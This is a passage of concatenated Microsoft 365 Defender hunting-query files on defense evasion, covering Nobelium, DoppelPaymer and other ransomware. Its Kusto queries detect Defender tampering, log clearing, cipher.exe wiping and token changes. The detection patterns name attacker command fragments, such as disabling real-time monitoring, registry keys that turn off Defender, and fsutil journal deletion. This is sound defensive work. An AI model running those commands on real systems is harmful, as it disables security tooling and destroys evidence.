reference*](https://docs.microsoft.com/azure/active-directory/reports-monitoring/reference-audit-activities). This query is inspired by an Azure Sentinal [detection](https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml). ## Query ```Kusto let auditLookback = 1d; (union isfuzzy=true ( CloudAppEvents | where Timestamp > ago(auditLookback) | where ActionType =~ "Set federation settings on domain." ), ( CloudAppEvents | where Timestamp > ago(auditLookback) | where ActionType =~ "Set domain authentication." | extend modifiedProperties = parse_json(RawEventData).ModifiedProperties | mvexpand modifiedProperties | extend newDomainValue=tostring(parse_json(modifiedProperties).NewValue) | where newDomainValue has "Federated" ) ) | extend resultStatus = extractjson("$.ResultStatus", tostring(RawEventData), typeof(string)) | extend targetDisplayName = parse_json(RawEventData).Target[0].ID | project Timestamp, ActionType, InitiatingUserOrApp=AccountDisplayName, targetDisplayName, resultStatus, InitiatingIPAddress=IPAddress, UserAgent ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | V | T1484.002 | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](../Campaigns/compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](../Campaigns/fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](../Campaigns/fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](../Campaigns/known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](../Campaigns/launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](../Campaigns/launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](../Campaigns/locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](../Campaigns/locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](../Campaigns/possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](./Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](./MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Blake Strom **GitHub alias:** @bstrom **Organization:** Microsoft 365 Defender **Contact info:** blstrom@microsoft.com ================================================ FILE: Defense evasion/Discovering potentially tampered devices [Nobelium].md ================================================ # Discovering potentially tampered devices [Nobelium] To evade security software and analyst tools, Nobelium malware enumerates the target system looking for certain running processes, loaded drivers, and registry keys, with the goal of disabling them. The Microsoft Defender for Endpoint sensor is one of the processes the malware attempts to disable. Microsoft Defender for Endpoint has built-in protections against many techniques attackers use to disable endpoint sensors ranging from hardened OS protection, anti-tampering policies, and detections for a variety of tampering attempts, including "Attempt to stop Microsoft Defender for Endpoint sensor", "Tampering with Microsoft Defender for Endpoint sensor settings", or "Possible sensor tampering in memory". Successfully disabling Microsoft Defender for Endpoint can prevent the system from reporting observed activities. However, the multitude of signals reported into Microsoft 365 Defender provides a unique opportunity to hunt for systems where the tampering technique used might have been successful. The following advanced hunting query can be used to locate devices that should be reporting but aren’t: ## Query ```Kusto // Times to be modified as appropriate let timeAgo=1d; let silenceTime=8h; // Get all silent devices and IPs from network events let allNetwork=materialize(DeviceNetworkEvents | where Timestamp > ago(timeAgo) and isnotempty(LocalIP) and isnotempty(RemoteIP) and ActionType in ("ConnectionSuccess", "InboundConnectionAccepted") and LocalIP !in ("127.0.0.1", "::1") | project DeviceId, Timestamp, LocalIP, RemoteIP, ReportId); let nonSilentDevices=allNetwork | where Timestamp > ago(silenceTime) | union (DeviceProcessEvents | where Timestamp > ago(silenceTime)) | summarize by DeviceId; let nonSilentIPs=allNetwork | where Timestamp > ago(silenceTime) | summarize by LocalIP; let silentDevices=allNetwork | where DeviceId !in (nonSilentDevices) and LocalIP !in (nonSilentIPs) | project DeviceId, LocalIP, Timestamp, ReportId; // Get all remote IPs that were recently active let addressesDuringSilence=allNetwork | where Timestamp > ago(silenceTime) | summarize by RemoteIP; // Potentially disconnected devices were connected but are silent silentDevices | where LocalIP in (addressesDuringSilence) | summarize ReportId=arg_max(Timestamp, ReportId), Timestamp=max(Timestamp), LocalIP=arg_max(Timestamp, LocalIP) by DeviceId | project DeviceId, ReportId=ReportId1, Timestamp, LocalIP=LocalIP1 ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | V | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](../Campaigns/compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](../Campaigns/fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](../Campaigns/fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](../Campaigns/known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](../Campaigns/launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](../Campaigns/launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](../Campaigns/locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](../Campaigns/locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](../Campaigns/possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](./ADFSDomainTrustMods[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](./MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Microsoft 365 Defender ================================================ FILE: Defense evasion/MailPermissionsAddedToApplication[Nobelium].md ================================================ # Mail.Read or Mail.ReadWrite permissions added to OAuth application This query will find applications that have been granted Mail.Read or Mail.ReadWrite permissions in which the corresponding user recently consented to. It can help identify applications that have been abused to gain access to user email. The actor, Nobelium, was observed modifying existing tenant application permissions to allow them to read user email through the Microsoft Graph API. See [*Customer Guidance on Recent Nation-State Cyber Attacks*](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/). This query is insprired by an Azure Sentinel [detection](https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/MailPermissionsAddedToApplication.yaml). ## Query ```Kusto let auditLookback = 1d; CloudAppEvents | where Timestamp > ago(auditLookback) | where ActionType == "Add delegated permission grant." | extend RawEventData = parse_json(RawEventData) | where RawEventData.ResultStatus =~ "success" | extend UserId = tostring(RawEventData.UserId) | extend UserAgent = parse_json(replace('-','',tostring(RawEventData.ExtendedPRoperties[0].Value))).UserAgent | extend properties = RawEventData.ModifiedProperties | mvexpand properties | extend Permissions = properties.NewValue | where Permissions has_any ("Mail.Read", "Mail.ReadWrite") | extend PermissionsAddedTo = tostring(RawEventData.Target[3].ID) // Get target of permissions | project-away properties, RawEventData | join kind=leftouter (CloudAppEvents | where Timestamp > ago(auditLookback) | where ActionType == "Consent to application." | where isnotempty(AccountDisplayName) | extend RawEventData = parse_json(RawEventData) | extend UserId = tostring(RawEventData.UserId) | extend targetInfo = RawEventData.Target | extend AppName = tostring(targetInfo[3].ID) // Find app name | extend AppId = tostring(targetInfo[4].ID) // Find appId | project ConsentTimestamp=Timestamp, UserId, AccountDisplayName, AppName, AppId ) on UserId | extend ConsentTimestamp = todatetime(format_datetime(ConsentTimestamp, 'MM/dd/yyyy HH:mm')) // Ensure app consent happend close to the same time as the permissions were granted | extend PermsTimestamp = todatetime(format_datetime(Timestamp, 'MM/dd/yyyy HH:mm')) | where PermsTimestamp -2m <= ConsentTimestamp // ensure consent happened near permissions grant | where PermsTimestamp +2m >= ConsentTimestamp | project Timestamp, ActionType, InitiatingUser=AccountDisplayName, UserId, InitiatingIP=IPAddress, UserAgent, PermissionsAddedTo, AppName, AppId ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | V | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](../Campaigns/compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](../Campaigns/fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](../Campaigns/fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](../Campaigns/known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](../Campaigns/launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](../Campaigns/launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](../Campaigns/locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](../Campaigns/locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](../Campaigns/possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](./ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](./Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Blake Strom **GitHub alias:** @bstrom **Organization:** Microsoft 365 Defender **Contact info:** blstrom@microsoft.com ================================================ FILE: Defense evasion/PotentialMicrosoftDefenderTampering[Solarigate].md ================================================ # Potential Microsoft Defender services tampering Identifies potential service tampering related to Microsoft Defender services. Query insprired by Azure Sentinel detection https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/PotentialMicrosoftDefenderTampering.yaml ## Query ``` let includeProc = dynamic(["sc.exe","net1.exe","net.exe", "taskkill.exe", "cmd.exe", "powershell.exe"]); let action = dynamic(["stop","disable", "delete"]); let service1 = dynamic(['sense', 'windefend', 'mssecflt']); let service2 = dynamic(['sense', 'windefend', 'mssecflt', 'healthservice']); let params1 = dynamic(["-DisableRealtimeMonitoring", "-DisableBehaviorMonitoring" ,"-DisableIOAVProtection"]); let params2 = dynamic(["sgrmbroker.exe", "mssense.exe"]); let regparams1 = dynamic(['reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender"', 'reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Advanced Threat Protection"']); let regparams2 = dynamic(['ForceDefenderPassiveMode', 'DisableAntiSpyware']); let regparams3 = dynamic(['sense', 'windefend']); let regparams4 = dynamic(['demand', 'disabled']); let timeframe = 1d; DeviceProcessEvents | where Timestamp >= ago(timeframe) | where InitiatingProcessFileName in~ (includeProc) | where (InitiatingProcessCommandLine has_any(action) and InitiatingProcessCommandLine has_any (service2) and InitiatingProcessParentFileName != 'cscript.exe') or (InitiatingProcessCommandLine has_any (params1) and InitiatingProcessCommandLine has 'Set-MpPreference' and InitiatingProcessCommandLine has '$true') or (InitiatingProcessCommandLine has_any (params2) and InitiatingProcessCommandLine has "/IM") or (InitiatingProcessCommandLine has_any (regparams1) and InitiatingProcessCommandLine has_any (regparams2) and InitiatingProcessCommandLine has '/d 1') or (InitiatingProcessCommandLine has_any("start") and InitiatingProcessCommandLine has "config" and InitiatingProcessCommandLine has_any (regparams3) and InitiatingProcessCommandLine has_any (regparams4)) | extend Account = iff(isnotempty(InitiatingProcessAccountUpn), InitiatingProcessAccountUpn, InitiatingProcessAccountName), Computer = DeviceName | project Timestamp, Computer, Account, AccountDomain, ProcessName = InitiatingProcessFileName, ProcessNameFullPath = FolderPath, Activity = ActionType, CommandLine = InitiatingProcessCommandLine, InitiatingProcessParentFileName ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | V | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Stefan Sellmer **GitHub alias:** @stesell **Organization:** Microsoft 365 Defender **Contact info:** stesell@microsoft.com ================================================ FILE: Defense evasion/UpdateStsRefreshToken[Solorigate].md ================================================ # Security Token Service (STS) refresh token modifications This will show Active Directory Security Token Service (STS) refresh token modifications by Service Principals and Applications other than DirectorySync. Refresh tokens are used to validate identification and obtain access tokens. This event is most often generated when legitimate administrators troubleshoot frequent AAD user sign-ins but may also be generated as a result of malicious token extensions. Confirm that the activity is related to an administrator legitimately modifying STS refresh tokens and check the new token validation time period for high values. Query insprired by Azure Sentinel detection https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/StsRefreshTokenModification.yaml ## Query ``` CloudAppEvents | where ActionType == "Update StsRefreshTokenValidFrom Timestamp." | where RawEventData !has "Directorysync" | extend displayName = RawEventData.ModifiedProperties[0].Name | where displayName == "StsRefreshTokensValidFrom" | extend oldValue = RawEventData.ModifiedProperties[0].OldValue | extend newValue = RawEventData.ModifiedProperties[0].NewValue | extend oldStsRefreshValidFrom = todatetime(parse_json(tostring(oldValue))[0]) | extend newStsRefreshValidFrom = todatetime(parse_json(tostring(newValue))[0]) | extend tokenMinutesAdded = datetime_diff('minute',newStsRefreshValidFrom,oldStsRefreshValidFrom) | extend tokenMinutesRemaining = datetime_diff('minute',Timestamp,newStsRefreshValidFrom) | extend Role = parse_json(RawEventData.Actor[-1]).ID | distinct AccountObjectId, AccountDisplayName, tostring(Role), IPAddress, IsAnonymousProxy, ISP, tokenMinutesAdded, tokenMinutesRemaining ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | V | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Stefan Sellmer **GitHub alias:** @stesell **Organization:** Microsoft 365 Defender **Contact info:** stesell@microsoft.com ================================================ FILE: Defense evasion/alt-data-streams.md ================================================ # Detect use of Alternate Data Streams This query was originally published in the threat analytics report, *Ransomware continues to hit healthcare, critical services*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/). In April of 2020, security researchers observed multiple ransomware campaigns using the same set of techniques. The following query detects suspicious use of [Alternate Data Streams](https://docs.microsoft.com/sysinternals/downloads/streams) (ADS), which may indicate an attempt to mask malicious activity. These campaigns have been known to deploy ransomware in-memory and exploit ADS. The [See also](#see=also) section below lists more queries related to techniques shared by these campaigns. ## Query ```Kusto // Alternate Data Streams execution DeviceProcessEvents | where Timestamp > ago(7d) // Command lines used | where ProcessCommandLine startswith "-q -s" and ProcessCommandLine hasprefix "-p" // Removing IDE processes and not(FolderPath has_any("visual studio", "ide")) | summarize make_set(ProcessCommandLine), make_set(FolderPath), make_set(InitiatingProcessCommandLine) by DeviceId, bin(Timestamp, 1h) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also [Return backup files deletion events](../Impact/backup-deletion.md) [Detect attempts to turn off System Restore](./turn-off-system-restore.md) [Detect cipher.exe deleting data](./deleting-data-w-cipher-tool.md) [Detect clearing of system logs](./clear-system-logs.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Defense evasion/clear-system-logs.md ================================================ # Detect clearing of system logs This query was originally published in the threat analytics report, *Ransomware continues to hit healthcare, critical services*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/). In April of 2020, security researchers observed multiple ransomware campaigns using the same set of techniques. The following query detects attempts to use *fsutil.exe* to clear system logs and delete forensic artifacts. The [See also](#see=also) section below lists more queries related to techniques shared by these campaigns. ## Query ```Kusto DeviceProcessEvents | where Timestamp > ago(7d) | where FileName =~ "fsutil.exe" and ProcessCommandLine has "usn" and ProcessCommandLine has "deletejournal" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also [Return backup files deletion events](../Impact/backup-deletion.md) [Detect use of Alternate Data Streams](./alt-data-streams.md) [Detect attempts to turn off System Restore](./turn-off-system-restore.md) [Detect cipher.exe deleting data](./deleting-data-w-cipher-tool.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Defense evasion/deleting-data-w-cipher-tool.md ================================================ # Detect cipher.exe deleting data This query was originally published in the threat analytics report, *Ransomware continues to hit healthcare, critical services*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/). In April of 2020, security researchers observed multiple ransomware campaigns using the same set of techniques. The following query detects the use of the tool *cipher.exe* to delete indicators of malicious activity right before encrypting a drive. The [See also](#see=also) section below lists more queries related to techniques shared by these campaigns. ## Query ```Kusto ​DeviceProcessEvents | where Timestamp > ago(7d) | where FileName =~ "cipher.exe" // Looking for /w flag for deleting | where ProcessCommandLine has "/w" | summarize CommandCount = dcount(ProcessCommandLine), make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 1m) // Looking for multiple drives in a short timeframe | where CommandCount > 1 ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also [Return backup files deletion events](../Impact/backup-deletion.md) [Detect use of Alternate Data Streams](./alt-data-streams.md) [Detect attempts to turn off System Restore](./turn-off-system-restore.md) [Detect clearing of system logs](./clear-system-logs.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Defense evasion/doppelpaymer-stop-services.md ================================================ # Detect DoppelPaymer operators stopping services This query was originally published in the threat analytics report, *Doppelpaymer: More human-operated ransomware*. There is also a related [blog](https://msrc-blog.microsoft.com/2019/11/20/customer-guidance-for-the-dopplepaymer-ransomware/). [DoppelPaymer](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/DoppelPaymer!MTB&threatId=-2147205372) is ransomware that is spread manually by human operators. These operators have exhibited extensive knowledge of system administration and common network security misconfigurations. They often use stolen credentials from over-privileged service accounts to turn off security software, run malicious commands, and spread malware throughout an organization. The following query detects attempts to stop security services. The [See also](#See-also) section below lists links to other queries associated with DoppelPaymer. ## Query ```Kusto // Attempts to stop services and allow ransomware execution DeviceProcessEvents | where Timestamp > ago(7d) | where InitiatingProcessFileName startswith "psexe" and FileName =~ "powershell.exe" and ProcessCommandLine has "stop-service" and ProcessCommandLine has "sql" and ProcessCommandLine has "msexchange" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Detect DoppelPaymer performing reconnaissance with net.exe](../Discovery/doppelpaymer.md) * [Detect DoppelPaymer operators spreading files with PsExec](../Lateral%20Movement/doppelpaymer-psexec.md) * [Detect DoppelPaymer operators dumping credentials with ProcDump](../Credential%20Access/doppelpaymer-procdump.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Defense evasion/hiding-java-class-file.md ================================================ # Hiding a Java class file This query was originally published in the threat analytics report, *Adwind utilizes Java for cross-platform impact*. Adwind is a remote access tool (RAT) that takes advantage of the cross-platform capabilities of the Java framework. It can check which operating system a target is running and adapt accordingly, allowing it to successfully compromise both Windows and macOS devices. The query below checks for attempts to disguise Java class files (i.e., complied code with a *.class* extension). Although the behavior detected by this query is typical of attacks that use Adwind malware, unrelated attacks may use the same or similar defense evasion techniques. See [Detecting a JAR attachment](../Initial%20access/jar-attachments.md) for an additional query that detects behavior associated with Adwind attacks. ## Query ```kusto union DeviceFileEvents, DeviceProcessEvents | where ProcessCommandLine has "attrib +h +s +r " and ProcessCommandLine contains ".class" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Defense evasion/locate-files-possibly-signed-by-fraudulent-ecc-certificates.md ================================================ # Locate files possibly signed by fraudulent ECC certificates This query was originally published in the threat analytics report, *CVE-2020-0601 certificate validation vulnerability*. The Windows CryptoAPI Spoofing Vulnerability, [CVE-2020-0601](https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2020-0601), can be exploited to spoof code-signing certificates. For example, an attacker could forge a certificate that lists Microsoft as the issuer. This would allow an attacker to disguise a malicious executable as legitimate. The vulnerability was patched with the [January 2020 Security Update](https://portal.msrc.microsoft.com/security-guidance/releasenotedetail/2020-Jan). Use the following query to locate files containing ECC certificates that might have been forged using this vulnerability. The query identifies files that don't correctly identify the signer name, yet list *Microsoft* as the root signer. ## Query ``` DeviceFileCertificateInfo | where Timestamp > ago(30d) | where IsSigned == 1 and IsTrusted == 1 and IsRootSignerMicrosoft == 1 | where SignatureType == "Embedded" | where Issuer !startswith "Microsoft" and Issuer !startswith "Windows" | project Timestamp, DeviceName,SHA1,Issuer,IssuerHash,Signer,SignerHash, CertificateCreationTime,CertificateExpirationTime,CrlDistributionPointUrls ``` ## Category This query 